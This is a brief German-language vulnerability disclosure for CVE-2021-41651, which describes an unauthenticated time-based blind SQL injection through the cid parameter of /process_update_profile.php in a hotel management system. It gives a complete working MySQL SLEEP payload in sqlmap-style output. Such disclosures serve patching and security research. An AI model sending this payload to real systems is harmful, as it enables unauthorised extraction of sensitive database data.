
Proof-of-concept-Exploit für CVE-2021-41651, das eine nicht authentifizierte zeitbasierte Blind-SQL-Injection in hotel-mgmt-system über den cid-Parameter demonstriert und die Extraktion sensibler Daten aus MySQL ermöglicht.
CVE-2021-41651 SQL Injection im hotel-mgmt-system
Das hotel-mgmt-system ist anfällig für einen unauthentifizierten zeitbasierten blinden SQL-Injection-Angriff.
Der cid-Parameter auf der Seite /process_update_profile.php bereinigt die Benutzereingabe nicht, ein Angreifer kann sensible Daten aus der zugrunde liegenden MySQL-Datenbank extrahieren.
URL: /process_update_profile.php
PARAMETER: cid
Parameter: cid ((custom) POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: phone=123456778&cid=14 AND (SELECT 9048 FROM (SELECT(SLEEP(5)))zCfD)-- IKdVf&submitBtn=Update&fullName=James&[email protected]&newPassword=fasdfasdfasdfasdfasdf-

Jason Colyvas
MOBIUSBINARY
23. September 2021